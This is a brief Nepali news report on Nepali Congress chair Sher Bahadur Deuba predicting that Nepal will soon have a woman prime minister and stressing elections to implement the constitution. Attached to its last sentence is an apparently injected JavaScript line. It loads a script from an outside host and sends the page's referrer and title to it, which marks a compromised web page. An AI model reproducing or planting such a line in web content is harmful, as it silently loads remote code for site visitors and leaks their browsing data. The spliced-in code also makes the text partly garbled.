नेपालमा छिट्टै महिला प्रधानमन्त्री हुन्छन्ः देउवा

काठमाडौँ, ५ असोज – नेपाली काँग्रेसका सभापति एवम् पूर्वप्रधानमन्त्री शेरबहादुर देउवाले नेपालमा राष्ट्रपति, प्रधान न्यायाधीश र सभामुख महिला भएको परिवेशमा एक दिन प्रधानमन्त्री पनि महिला हुने बताएका छन् ।

पार्टीको भ्रातृ संस्था नेपाल महिला सङ्घले तेस्रो महाधिवशेनबाट निर्वाचित पदाधिकारी तथा सदस्यलाई पद हस्तान्तरण गर्न आज आयोजना गरेको कार्यक्रममा सभापति देउवाले सो कुरा बताएका हुन् ।

संविधानसभाबाट संविधान जारी भएपछि महिलाका हक अधिकार बढेको बताउँदै उनले भने, “छिट्टै हुने स्थानीय निकायको निर्वाचनमा पनि संविधानले महिलाको बढी प्रतिनिधित्व हुने प्रावधान गरेको छ ।”

संविधान कार्यान्वयन मुलुकको प्रमुख चुनौती भएको बताउँदै सभापति देउवाले त्यसका लागि स्थानीय, प्रान्तीय र सङ्घीय निर्वाचन हुनु अपरिहार्य रहेको विचार व्यक्त गरे ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...